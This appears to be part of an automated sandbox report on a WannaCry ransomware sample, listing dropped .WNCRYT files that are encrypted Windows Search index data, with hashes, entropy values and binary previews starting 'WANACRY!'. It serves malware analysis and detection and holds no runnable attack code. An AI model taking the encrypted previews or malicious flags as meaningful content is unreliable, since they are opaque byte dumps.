Entropy (8bit):	7.99595578837881
Encrypted:	true
SSDEEP:	768:4eBaOBuTt29+mNOVDVzIhWPYvSUpL1ZnAFwbzR5IKsJJS2zMZVAZHfI+p:RBvuW+wOVVIhfvSKL7nAFwh58ZZ/IQ
MD5:	BD5D1114F91BA675B7B232D7385C2D41
SHA1:	FDAB09F44920A97A6C292ED44E6897490C688809
SHA-256:	91C99ADC60C78CA8D0FCDE56C09D5FA0B2CE7FA1856344DF22805B70614ECF55
SHA-512:	EC2DC1BA2D3A0FA00655172387B9EB026459E457B99E0D3B4D6D0758F566D86127B127B97B07079A72073D3AE8EB40963D5831CD88CA42402ED18243CBC08708
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......s....u...]).U....(\|.6.H-..P.~.IQ.y}...x..{:.;.. Z.X.;..1C..P...sP.G......`..'.%..v...<....H......m7D......T.....%n..}.;.m...P...qRF......=..[...W.F"xj]..I.qp.......R9...g3..M.%zC_.....D..L.h,_..5UB7.3.h....M..P9-T.B...\.{...'6...d.%....y.........(R..2..$...[~..H$B.[..#+7@...sV.d..2`......(...=U.+..-.(3?.Rg....b...)..$P..5.....g.....7.M...8..ls...mb{5z.UA.?..8.....C..sj[...y......I{o..u..@.Ro.W.I.JO=u+.r...\|`....x..Z........g......K'z.r-..y<..n.5X..eR..?44...k#..\...9.....JY..z72...{&`..4....J..g.CJ..}..CC.U:..?.N..i.L..\|..#...D.~.->.7.....\|..H.....f...2&....QT...eOk..3.:R..n}..Vw.;T....b...:....!.`..s.W.!>.......\...Z..N.h.f\|.1....\<.^.5..$.c....Ep.4.O.....[n.a.[@u.7.).....$...O..V..Oc92.4...i.8@Yg.Z\....~.p..(.....Y.C...iF...GW..{.E..sI..t:....>.SX....j)).x.q/...:......a'y[...S.R....F'.K.12W..FYl..f..2..8..x.U.A8.....J.4-....b...,8.1....w..7c..Y...r..eu..Ez#.....V.,..#$...X........}o%!{.4?..6,.........>S...r.]t

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{46669ec3-9227-40ac-89bc-b477e4677a0b}\0.1.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.19529345355775
Encrypted:	false
SSDEEP:	6:bkETXKuP13OLNi2tUOTWGBzk3thCHkK7YP1CP7JY9jIiiZmhGnNxv:bkETXKuP13afZlBzk3tTaTJIxiZPxv
MD5:	C6901519C3129F18E5C0CB9E8AC9CCB4
SHA1:	15C78F8CCD231EF65F98AE428A3DC4D176B369E7
SHA-256:	E14D6EFCE47857FC321FA5B76B48CC0F61F71B0E0F66A943634D8905D8BF56CD
SHA-512:	6B87B8F765F9166F668B253C362E541A6F5E1C4D19F434072DD220B975AB8EBEF58B380F269EFBEBEC825595CDB0CA77FD1A123D69FD0EFC29D603436CEAC5C5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......N./c.l...;..S}s..&..~w..,"..k?.h......^.Pl.......=.B..$...K.Oq..m.\|n..n.j..K.8....e.].}......Cm...C.H\|..q./mrY....k..\l.:G@6.P.e.5K........+...\|'g".TZ..wTcx.+.+.0.9.qew...:.@....1....(....p......<F@...b.TB.ja._......_.....oI.M..+)...f...S.............m."(..4...K.\|

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{46669ec3-9227-40ac-89bc-b477e4677a0b}\0.2.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.183285470628861
Encrypted:	false
SSDEEP:	6:bkE4TFLXdwbkL61ksTV4Rs0I0ro0MFQ7LZMSHukASvg6Rbkb+xl/Su+Pq:bkE4TFrdwbC61ks+bIcojFqdHuu1bhl1
MD5:	35615D0616A9BC0A7990D0E0BE877DCD
SHA1:	110F2C80F7B38B7E31CAA1B1CCF8DA31FF89CDEF
SHA-256:	999EED9501C7E3D13D61B9EB156BDB860EC060D3D5ABA1D73036D423E589D58D
SHA-512:	3E09F61A3314CCFCB8CB69D3197A178C7CFB9DBB88FB36708EBB9C8E0DAFE2917EEFFFDBE486E2425055DBCD131A9071CF83776AF4D41D901F540F310AED099F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......}.#_......F.Q.%H.t&.6..[..t...2b`......Q.2.g.K.....Lq.U+..3.=...7./....../..%.<.o.}...+.....J..L...=M..l.y\<..G. ...z../...w.o..Q..c.v\|.k....V....a.yQo.o.F.....rJD...1O0.....+.9..ew.W...u.)...,-....\|BsZ...\...-Cs..[..V.9.n.,i.n[9}.`...............x...0$.....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5e0f71d6-4ae9-410b-87f6-29dff172110e}\0.0.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.995829964069959
Encrypted:	true
SSDEEP:	768:B1NhpcaSfi/4Aa9mteZEiHuXVXlGFB94kn3GN0gwhFPU8uMTgRSV3lh:nTpc6/Ta9mDiHwXlGFB9wSuMTFT
MD5:	81FBACCD2C793241E17B82618AE57A04
SHA1:	D884C1612F66F17C3A372D354B218CF76782CD1B
SHA-256:	8584EB3F535BCF0B4E9A660D2A3EDE4A694F00EB17EFAD9F969776467BB324A9
SHA-512:	531FB585DF47F3367406CFE7AD8A5E1740A4D1B0A153625AF5C2F4C583188EC06AC79F7EBB3FC50C753E18B108002A1E1BD44D1A1BCF55B9B642F80C7FBD98D4
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......)U..p.#5Z]......_..\.aU.."....?M....LO0TmPj.1...v.''. .z.8.31.a.."QpS~1..o.8.U....-..S.Y...lU7$A...e..FJ..CP...D.2=..e..r..c.X...U......_...+.}.Tv.).....=.......z]j..E...2B.......I.SJr.[..$.(..K..YT..,.......5....L8.\!Zc........~.....NC.....y.........o.......u....^D.!....-:.cd.=.g9.Pu..E.......d}.,.{s..5....Y..].n).WE.8..w?,&..O.....(y.......]....k$..<............_...v2.K.!S....H..2.....).d..!.'.qYp.W.qu....u..4.E....3.....\.,.....f.>...T........6.;Q.....-..(...r7vW.@0VeA..';..N-.....&s."wG.i< .........`..._1..^..r.......ls.<....V5.g;N....:(..&..@?A.....C..y`C........"..G.5....".......fI.B...3.x.X.'..R........~'..85..F..X.........>...gVp}.!.I.`.?...W.O6`...g)...&!.$..Y.f..."u...n..u.....ru.\|F(...r..R.B.ywb.@R\|.Hm.;.(R:.I....1..T....1...cOC.....5..G..b.@...?....f.Yf.....h.HN..y.o.S%U..$.[..y.7.......'..I,.!.i`h..k.1..PY.UT..O.\|V../.:.7.S+-.8^.Y.8..cEVVgI{..*u..jd).B>Z.Y..h$.;.!2..d9{D{.Bg.LL........a\..+L....<9.d..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5e0f71d6-4ae9-410b-87f6-29dff172110e}\0.1.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.174710859410831
Encrypted:	false
SSDEEP:	6:bkEeiSikpAkJ+vvD61DjaHAUeKK7DEB4hQ6no1Rm3c/0ry:bkEeiSXAkwnDCjaHAqoDf3nol8e
MD5:	5D2C87BB12820430B40DBA8E0552828C
SHA1:	7622209D67C733B67AFD3FA2BDCACF797F639A78
SHA-256:	5EC5BEE94A732E726F4C032A1B9DBDFE8D1466C52FBCEA87225486D7C44B3F45
SHA-512:	F6F4EA28EC55C78B3774235FB1E4D17F745E07BE9155F8DEE44168EBF0CA5F21E2346404F0DE2A768F10DD72B57739F9A852E4563809DFA342F3485F2BCE8E51
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....J..g\|N4.,O..>'.G!..!b..>0.5.@...{.7.....O.0xl....#..+...f...[.b.Nf.lq~..j.+...\|eb.m......D...r....\|.....A6.......K....0... ^]..?..5.....U3..A_...w......$...D.~.p.~.O`2.....}.....A.w++.....1.r..#B.^%..,X..b..7....Q0.H..\|..!^....DV......`.................N1...E.....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5e0f71d6-4ae9-410b-87f6-29dff172110e}\0.2.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.160727867899281
Encrypted:	false
SSDEEP:	6:bkErLFAAaoeij+5xb6v3PavL18TYvlgjYx4Au6Hel9ckO+QG5:bkErLFc5M3avL180lg8x4J6+l9c1G5
MD5:	3F509EE99C78AE0751ECE52D8E95FDFA
SHA1:	FC88581A3A5ED80CF214F64D3D24AC44BDDDED48
SHA-256:	3ADB0076811E102665DCDE6DF96547A5AF4D72B8F3F26166A6E72E576955DE09
SHA-512:	37DF3F89A005E0D204E7082D2FE3E4CB3AC91AE83AE66C2AF6954A80860930858C1BF07DAA823BD6DF236961C69A265663D12610FCB534824A7C3ED01B3AA1C3
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....nIt.A..pe...B.?.......z.P.DOMH...2..^e.(X"..e>..;...g<nT..`...X_.Yu....H..z....I<~.3.z....y.!..a0'..f.....s..Me;Q..D.......,..A..K.?..Q.\........V.h.'7.....(.}......3..9....t..M.{......pv...J..&al..v-;.Wm.......BZ...B..(....uI.B..`.J9.e....................:..cnZ]..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6e3a287d-8222-4208-8758-9aa4793f0897}\0.0.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.996057589590536
Encrypted:	true
SSDEEP:	768:wg4LDV7vNEgWapHlTmAmjztuFikW2D4Tus2SS8g0FjTz90yuAJ9Dc/k0VxDU4KAG:Ah7VEgtHlTNqvkWkGusL3Fj/90ho9h0K
MD5:	C3F53E4A24CC2620E56488320C1781F8
SHA1:	93A864EFF6497FEAB4E307DCC0A981ACEF06ED6C
SHA-256:	440E8A6A8CF1BF3EE299DDF9FEF2C4BC431EC6A0C7402CA189983D7E9FB51991
SHA-512:	F52DED1C943C6EF1911ADAA83FEBF7EA32737A5D164A3D99A82F1359543D681E52D1D2CFE9A9CDA47B384FB1CB3D13EB424EDCE522CCEB984884C83556DF6112
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......0.RD.P.b.k.(.^..~.a<..yJ..8....v.z%8+Om.~w.......]C..4/..0S... b....t.kK".....'u.y`b,D.`..>.......X..?.p.'..R...>..$...I.c~4T.r..2D.ON..u..o4.X<?.qp...6.W..(!4h..U..<......@Vy..f..BMe...3...j....N.t...&9.^....1.ao.....:y.....'....7.. Nf9....y..........j.g.q..;.....V.._..e...T0_F.aA.IL...;.&.>.....n@.q..n.zK..;.......u..'kwzh6z..v..;q....>.`.....{....S...Q.0..e.oz.....U..D...Y.l_.`lX...."......F....F.%.^..YF....4]..x^v.^!.......6..S...=-9..X ...........0....e..d..Z.%...v.{...].&Y7...&.#.v.?~}.........e.^.0a..'..w.Oji%.F..n..d...^..0.mga......CR<._&...6........FY...R..r..I`..C.{..C>.6.....9.^/+...E..Dv.h.e.....t"...H...$.. .s.Z!.V9.%...U...U.j.......p.q:.O.V...~)..:..2?..y.I}5.Z.....8p.....;gv..?},.Gg....v..[.....G...9R.......#^3-..k....U.u....i.`...s%x_.[.3=..CoS..wz,V..9U.f.w..........B.vh..9.a:I..6'.^!....wE...(6......E..d.k...eE......G.~..AKMEY.IP.\|.MED<rR%.-HK.G.Y;...g5..k...m...v.2..;..Y~..E.J.7vL.9.F...;(.Y%.x1_

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6e3a287d-8222-4208-8758-9aa4793f0897}\0.1.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.121418840793202
Encrypted:	false
SSDEEP:	6:bkETmSZD4dpvn+10SleOp+7AXZouRsY3HHF/016SFoXlWUf+Dfw8V73a:bkExB42neOp+WZouRVHl/I/SVXf4IC3a
MD5:	06B2D37EA9B007A01F5DFDA5711C5B27
SHA1:	CE5FBF836CD0C6417FA1A5E0A7E1E54FFCF4A7CF
SHA-256:	B917753E17A312637FA5809520FA37447601F5C38D03B932C436987E45521343
SHA-512:	2207155145280BE2388307CBE85263E9772391864D914749CF7F39EB08133D8ED80535987D0DA12403F80BA37B6B49ABE3B83EFD74E95E56808AADB6B7F87B67
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......R..<w;R!:....^.B...?.r.lx. ..-......,\|.od..ye(.m.]D.<eI.vZO.. ..n......I.W=.h....f\|o^..0...Z......L..3![....f..%d..^$F.7.t./}.i^.w..M..<X(x.K.BR.JJ.-..`..u5.U(....:.T....i.E.=X44\|...d..eKI-.Q+.G.......:3G_.g..zH.....KE..a.t:[..!!..A...aYF;...............2..f.x..<7..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6e3a287d-8222-4208-8758-9aa4793f0897}\0.2.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.20670638301562
Encrypted:	false
SSDEEP:	6:bkEbRcGdII6zxjQAtF0pe/IC39erW79qu7RRHDpqDlpuJIc87DUNqvkJbGC/Tf:bkEKG2/zxjJzj/P90uNVRjohpwx8HdMF
MD5:	C48A74FE69C44BD37973C753AEA4E365
SHA1:	8E33C603D021C5FD62BC9BF3D4E3E3D77220B50F
SHA-256:	66FFBF132AE70F980BC2D4992C814E8AA3C5FE48278F00ED1074A3944E275349
SHA-512:	E48CFC104A0C220E9DFD1DBEBF4E4DA1BC45E9A0E86F7BD2163351C36FFC2EFE93100A115F8529BA2651E34DA48E46232F7589248F2BF6DB6E4ED510982BA875
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......W.Q.....<.H....DS}...M.o..7.G.t..).-@....#.$G...xR.uI={...5T.Fi....e_hx....).V....j..</......Z..`,.V.....-.[-...'7F... .......z...M!).]{08...rw..t..8pA.{...5..h<..u...\.......g...........}....,.:....r2.w.f.=.1.$...1 ..S+#Y...B*.S.p.~{..vGp....................8..!T.;6

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96ab5c09-25d6-4ec8-9dfa-01fef4843b90}\0.0.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.996311504565553
Encrypted:	true
SSDEEP:	768:rQRc8wq9OPK4glnUoQ7QI2A/7TcLgkX2QmqGsywk29zCFNZtzKeJKQDD46AbO:Cc879OPQUo3I2ETcLEQUsytmWFNZRKwb
MD5:	8BE1CC9E9DA3E18ECBB139DBA87AE4DE
SHA1:	D57BB34076D4EA194870FB8A1D8D1A4FD2237EE3
SHA-256:	A50BE809EBBA7AE4DC40F2193CFFE65AFB852A7321E9E7970DB7EF64B553693B
SHA-512:	7B158E138C1D3D824E53F84AAD57B166E90BD56C0DBC9AB10B0DEBEDDBDFCD780F837CE5F10070CF166EA85260667C4707A745790A137A850D3A02A992A8BA89
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....).^.h1.."s.m].zd.?N#...6Y..J..7..I.[......=...9.N....j. .vx.5.B.`.9....!1p.W.....)O\|..136....x~..0.....p.!..H-^).\..7'+.Y....mD......j.n.a.......y.....4.y&.8:.....$!.^g.X.$k.]...]...J...S.....<.k...8%.z).t4$.6.n.Q........'...C...R.....xj....y....y..........ni............G.....?D.)=l........d).P@E.I..N..D...[..Ig#..e._(._..y....#....6.L.?x}_.e..V....`...E.;.n.. . .U..N...EH..S)1.]...].0.F..e.wl...O{..o".E. [LV...2..AB(.$t..f..6.dN...?...t....RZT..\|..S..l..m...qUb.J....O..8s.\|..v..I...1qG...O..d..d_.VyO..T;.........K.0;u....1H.-0.2N..........PN3u.IuE..,Q....B.BT.D;..g.B..8f.5(.>..o..-%.j.3e...O.!....Z^ ....5.......=.......\|..!6.#'~.8.B....3Q..tW.@^..ul...CV....M>........((?.[.k...C.!.YB..H...q.y.K.@$..Kq.../:..h.4td.>.X....&.K......x....X... g....FHy...\4...!1.....E.`>n.."..v.m..Ur:.\|Vq.B...W...;..h.Gi..v2.H..5G...M...!.;{f.......OV.%..`....\|.3.".....sQc_.C......F...~j....E5....*p..1ZGg..xW.x".......r...t.....)A.x(.~"...s....,4&...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96ab5c09-25d6-4ec8-9dfa-01fef4843b90}\0.1.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.155569602204235
Encrypted:	false
SSDEEP:	6:bkEldqnf9j51vIuNo5VMRCVdCyX5pyB8ceWAUMrp8Zc5bZmgotL+LN:bkE7cFLvpNo5VOCVdCyu8pWAURi59y+B
MD5:	6C7CD5E2175127E8F4484E74235366DA
SHA1:	047E31BCE374251CC03DA172971EC7093F1673E3
SHA-256:	003105331BF7E81F0FDE869BF0DE80353FE0FEE03A2E5F73B17155AB3A5974F0
SHA-512:	EC4FBA324B73F1E7027A1B9A6C80B6B75954C87ABFC2F198E9CEE193671D66AE24B2F3CC12F10A4E9B86312D622EA270C1552209155246E3989BD888292874F4
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......1..@.{4...Y)..O.(.u.X.O\|.....&.%......o...V....a..~.S.c.Ru.Xi#..6....B...."..\.... Q..M.. ...*....."......EUc......OhH.."o.....{.l..a.m~M.^... ...{.....^....9.'R...dB)..".....mP&.H...<...Mm4.%...g\|HDf.)c6..%..=.y.X.J.....u.e.{.P.w0+1...8...............e..<..U...V..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96ab5c09-25d6-4ec8-9dfa-01fef4843b90}\0.2.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.20044869853918
Encrypted:	false
SSDEEP:	6:bkE3mtJ7n4GOk3NNIkMeKpy5T5AFVbwzGcqFBQMnU08oVUJml0Y42s:bkE3m4pkdNvKcgbdU08CZY
MD5:	8A11D94CCE6BCE5288E499CADCC4FA37
SHA1:	25BC899EF90B23D82147A5746B9C768CB8B7F203
SHA-256:	A9113F0B9F01C845E2C13634EAD1D319A5140F64948F5AC37CB17A2EF07484E4
SHA-512:	3E06164C689452C7FAB32C67402D29830CDF17E463AD8A52C53629FE76866FA794A2D3017FB86859A26B33EE1DE77D06B468F3F3DBA460D74AED081CB89E7401
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....N....S..&..g.....y..R...w...%.#..<./.vZ.X.[..s.R.......p.@.I"..'..#2..?..........2..Bg..W.W.F....F`+.8(....i.U.x.b...u.....m0...j..,.K+UM.VKT...`..t....%S.m.P.]...$i.).kk.....2.,...:...Fs..^.De..X...F.m\.b...9uDi...%".,w.P;hM=..2..^m......^...SEdTL............U.u............

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a57f3ddc-63c5-42f9-b016-09afa52762e5}\0.0.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47256
Entropy (8bit):	7.9957123401853485
Encrypted:	true
SSDEEP:	768:Eef+wCk9DlbXlLcpyzyRNT+4iGmMDBxb1R3O2zpDDsSkxTaIe6Vq+66aAywhPI6m:WwCk9Lc3NT+hABxbz3R1Dg3e6KLwhPcx
MD5:	889367C183C0C45318D8FCC7CBA045C1
SHA1:	81284DEBFF1EF0F8F31FD26819DBA717214EF71D
SHA-256:	C4DD9ACA7731CEB2566C3330FEFDB9150119F1A6F8F115CE5E77E3F3C5B24E4F
SHA-512:	ACC0108B479FE8D4DFB4272AE34B6C6666CD75AAD539B7228E9E1F4EE96049E8F6F3333F74E9696B154EC4C7CCC410CC9EF85087296FC90CC81CB3DD49C7833B
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....-....3P,...1.f.W.n. 0oc.......ZO......?..<..j....t.e.\..[...9\|O....yl......9B...........<-.....2.9k..~....0.C9p..Z...<._,".h...l9....I}..!B0..h..5.....!..i.V.....b....^x...F...=p.P..[6R."..E]..........o.s..C......No&..#h..z40.A.xsg.%.8..f.....y.......;."..tt..'s(...&vR.8Y.c.j ......9i....\|\|.$......,...:.....'R.ST.U.ch..l......q...0.........u9.M{P?.;O.$...).ZK......Z2..i.q?.+(.N .M6.:..A........kVD^.l.....G.....c..e....j1 .3.v....%H.....j9S.......D.^....B....t...1io..u'x...5".[..zK..D$iP."e.JlX..L+T....S..`V?].v.eO...".>h....'.........O.r..=C..;WA(u.+.t`.f..B.KAM....u.U...w3...]..fT.rZE.E..5j;\|E.D.ygX.W.g1m.?L.@.;......q...(..\|q....._.!.w_....u.R]^B..{....m...&.0%..s%......6.p.O......L..S..".w.....EF6.F..4..*.S.......y..E..6t..u0L.:.)2N...C.............^C.d.4...p....u.^......Z.O;....\`....;...n.3.....)...h....7....[.....'..v{Z.T....)H....j.d.q...D.."0..l.s^...:...}....'.]!f.1`.......6x..0.{A`^.M....l....@..m2.b<L.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsconversions.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1426184
Entropy (8bit):	7.999871184482246
Encrypted:	true
SSDEEP:	24576:QMIl6B9pxhk2r39wy62TjliBvp6ajfapXhKRepcu6g+zCgZpiw1oQqlk+jxCCj:EALbteMPl+pHeDKYpdqZd1q+ECCj
MD5:	C0E44973ECE67A1163A2FE3008536B44
SHA1:	B22BA50E086AC0AE0C895F90D395635E8E946FD1
SHA-256:	EE9185188C7D7E57B2B58845AF199220E50CBC1AEF4306972E46D940291E88D5
SHA-512:	A84EB475DEFF988ABB8168EFEB566CD4B4882E6E004DEEC6210EF78549C68314272D232EA2B8918FFEC18724FA98FD13728505056BEC0C684C8F987EC929198B
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....x+. .qa........\|....d.s.nF....I..(.=..1.t...6...U._Uu..W7.....$vSfy.S.>xv.S1',.:>...^.....[A..[......??.....g.N.B..B.;.j.Vfqs.R..9H.V.S...O...V5.j...GDl./,.#1`....TU[....r....D.0.&~.n.....G..Q9V...@...P`J`.r.g..'.s..............@R..];:....D.P................n~...3../.r\...O.?....7n.+.9...y...R.=..&..B..h.....0..D."...9.'.\..5I..f>($..BZD&]S.@.......{...0..xSv..K\3t...=.Tt..v.S.`O?`...].SY.;v^?....Jo.1U4..6.......7...R...[b..W:.k..z.....K.3R..X\|H...7...qh.a..7.t......!.>.......gq.1.....A.......o.._..d.W&.8....b..\6...."..y%...v......T..^."<......;..t...[.I..#i.OE.e.n&.e.._..0.K=......Z....ui.'.hV....y..c..u?.f.i...Q."..$.hh..-6T..lN......N.).W..Q.\H.........t..d=N.37j.3._.D.R2:D-..+.[.SR..^......^.R ..c...#H.oP....GP0'..^!...~.k..c."...,./......'..<...8..3?..4..%.7.+.T...L.;.$g.8....._.".K....]A...kI........a(. {.[No..F...0..]PI...Ch;Y.7...KNM._....v1.....3.P#Nd`.R..d..0...TM.~...(}bta.....)37..e4N,..V....0......9.T8.p...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appsglobals.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	339640
Entropy (8bit):	7.99953826868263
Encrypted:	true
SSDEEP:	6144:n9OpRaDzrOK679Jh1pkqv17trd67lA/nfW+3J5gqfm0GHXAi1dbmww:n9OpRar16BJh1Wqd5rgO1LgSm06nK/
MD5:	FC6776B826A664304B1CC028B6542046
SHA1:	AB5B1A3414D80D116F8DBFC88036F4CF0C940D08
SHA-256:	D56254217D51F5B3F2CEB6A6090F1B90DD462B0CDEBDE0A96937D28C166D2267
SHA-512:	1CCB33E5E16ADE301750EEAF6242DB0B8CE4CD53E98745D7303F4B0203B8E4604EA56B507FBD332F43700C5E67E3C32E60195EF3615737D467679AEBB6023DBA
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....@..z..g."..l3..].......d?^c.D<c.zS.@-....NZ.......3.....m..u.L..M.i..........;...F.}..mL..Ok..A.Wu...A.)..B.X..XA!..Jmn.9i>.\..J...l...T....g........-.e.T...\...............%..({.Y...`.!:A....]$2...3s,..O......>L.m..;.........?n.w...j..Y......-...........&58.@........u......xs.2.....d..M.......G..i.....G....{S...(..-s..e%uE...\......Yf..F.UL.\|.k.6.I.....t.&X...s#...M.=V..uW~.......$X..e.1KXOzJ..?.H......z{..R.`e.Y!M..e%f.V..t..?..)WL.7...G..Z..#jt.&..<-8.......+...._.P.1.P._...3cZ.=.Za_\..z.V....~.s.sCh...@$....v.z.....Y......6z.;:;..w4..{.A..u...D........99......6..Lm.....;...._..Po..]{...x[.o.?.:..Zy..mT7e.MS...j<.2..C!....Q4..A.2.9...7.b..E%S.3..B.s.w.i.}!smK..7..}.j..B.P..QW....6.....\}z9....8a.%....A:,.r..'1~..w{.O...,.;6..Ta5j.ST.B..#..?..=Y...~.I.....6.....u..-...}.L..V\|7..##.&q.$u..._..\v......_.J..h.:..PzjAn..U.5..^x..f.9...7../..-D..\|.....c..2..........Q.+.C[i~....'.....wh..Q.....fAc..Z.0'S\.......w...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\appssynonyms.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	383288
Entropy (8bit):	7.999514231546068
Encrypted:	true
SSDEEP:	6144:su6fOx8pPxWf/b7EI4EHIup+1GBEt/9ciJy/ImS41wgX0+8d7vMZTL++SNpiz5r3:HcOx8pYfJ4EoFs29ci0r1wgX0Zd7vkTb
MD5:	1DE5036CBC453C3096D88CB4E1017E37
SHA1:	7D4B74E83BA0CB659C4465A86B666040C2AC3F09
SHA-256:	33CC4146B20E1A0420B59E8A8D719E39F9DB6DAF9C7571FDC59EBAA4C23B4312
SHA-512:	482D0A63A24D238A7115EE5B6910D99A3F97969CA9A71C471EA890ED0A6E57A2BE96354AC1A5BC58B4B9924E81C4103E7BDAF2266B17FC91F3C581E6BE7ABA06
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.........<fV>....H.U.cB#<..+=.C.w.T....n......(..^?..l..zSc.....ej.Tme...0.P1w..u?.&.79`."D{....p.y.......<m....._..i..#...=.T ....i.]..z..z.k...RB. T...=%..z.a...>#L...4.j..p.....2.N.p7;.....+P..'..m.%UQ.CF..z.<K..k..d;....j!.....Au.:!.~o.E...H..................."O..>....S#{x.99_..g...1.6.....S&....E....q.:..w.!....i2....u.w.XG'..=ue.u)L.Y.....&.k...'.F.Cx1..:..y...H.>\|vE.........G.W....@....@h,A....S......\W.$MC..e..>...6a_..-I. .J.oZr....$.Q.o.\@.1.{k....u8..x ..Bw..OT.r........t.x.....9...N.g[<.n#.........(S.Q.jb..........o....E<..-..[..'....g.)d.........e.r....'...P....0....%}s..9...e.....=&9.....UR..%..4h.F.fV-Q......pG<.~..T....r.._d.@.y-Ss.2.u.l...~$.&~Jg....D.B.\|....../....M..D[...@K..9.).&XO.\.=..#..?.4..cE./f..t.\.....o.B3..O..:.~..O.`"2P.....1"}...$.WF._....r..,...8... ..z....L...Q.zyC&...L-e.......4[.......9.hD!.-.....t............Y....*.z.A....J".Q..pZ.......<...`..s.....g.,...K...F...&i(..y...G.....p.\|..4{k

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsconversions.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	533032
Entropy (8bit):	7.999651614034114
Encrypted:	true
SSDEEP:	12288:mUhOmiorSkmnh4J7/58ZuJPws4Wxz8hFcJ4B4819kA9zUGwbZ:mUhOmiopu4JKZCw5wQFcJ4Z19fzPSZ
MD5:	D15172182F901D6B02A0965FA7B9F2EA
